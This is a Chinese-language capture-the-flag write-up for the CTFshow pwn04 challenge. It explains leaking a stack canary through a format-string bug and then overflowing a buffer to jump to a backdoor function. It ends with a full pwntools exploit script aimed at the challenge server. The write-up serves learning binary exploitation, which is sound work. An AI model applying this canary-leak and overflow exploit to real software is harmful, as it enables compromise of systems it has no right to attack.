1、CTFshow-pwn04(基础canary)
好久没碰过pwn了,今天临时做一道吧,毕竟刚联合了WSL和VSCode,想着试着做一道题看看,结果随手一点,就是一个很少接触的,拿来刷刷:
先查看下保护:
root@MSI:/home/g01den/Temp# checksec pwn
[*] '/home/g01den/Temp/pwn'Arch: i386-32-littleRELRO: Partial RELROStack: Canary foundNX: NX enabledPIE: No PIE (0x8048000)
除了NX之外,似乎就只有 Canary了。反编译看看:
有用的只有vuln函数:
unsigned int vuln()
{int i; // [esp+4h] [ebp-74h]char buf[100]; // [esp+8h] [ebp-70h] BYREFunsigned int v3; // [esp+6Ch] [ebp-Ch]v3 = __readgsdword(0x14u);for ( i = 0; i <= 1; ++i ){read(0, buf, 0x200u);printf(buf);}return __readgsdword(0x14u) ^ v3;
}
发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。
因此,思路就很明确了。
之后通过disass vuln 查看汇编代码,发现了重要的一个内容,它在 ret 之前进行了一次异或,且指定的内存为[ebp-0xc]:
0x08048677 <+73>: nop0x08048678 <+74>: mov eax,DWORD PTR [ebp-0xc]0x0804867b <+77>: xor eax,DWORD PTR gs:0x140x08048682 <+84>: je 0x8048689 <vuln+91>0x08048684 <+86>: call 0x8048450 <__stack_chk_fail@plt>0x08048689 <+91>: leave 0x0804868a <+92>: ret
由此可知,cannary存放的地址就是[ebp-0xc],看一下:
1f:007c│-00c 0xffffd56c ◂— 0x7493ea00
20:0080│-008 0xffffd570 —▸ 0x8048768 ◂— dec eax /* 'Hello Hacker!' */
21:0084│-004 0xffffd574 ◂— 0xa0000
22:0088│ ebp 0xffffd578 —▸ 0xffffd598 ◂— 0
目测cannary的值为0x7493ea00,那么, 想要泄露这个值,需要使用格式化字符串来泄露,那么,来判断下对不对吧,我们输入%31$x即可泄露:
根据这俩进行计算,可得到偏移,结果是0x7c/4=31。
之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。
由于存在后门函数,所以exp如下:
from pwn import *#context.terminal = ["tmux", "splitw", "-h"]
Locale = 0if Locale == 1:io = process('./pwn')
else:io = remote('pwn.challenge.ctf.show',28203)context(arch='i386', os='linux', log_level='debug')io.recv()
payload1 = b"%31$x"
io.sendline(payload1)
io.recvuntil(b'\n')
canary = int(io.recvuntil(b'\n'),16)getshell_addr = 0x0804859Bpayload = b"a"*100 + p32(canary) + b'a'*12 + p32(getshell_addr)
io.sendline(payload)io.interactive()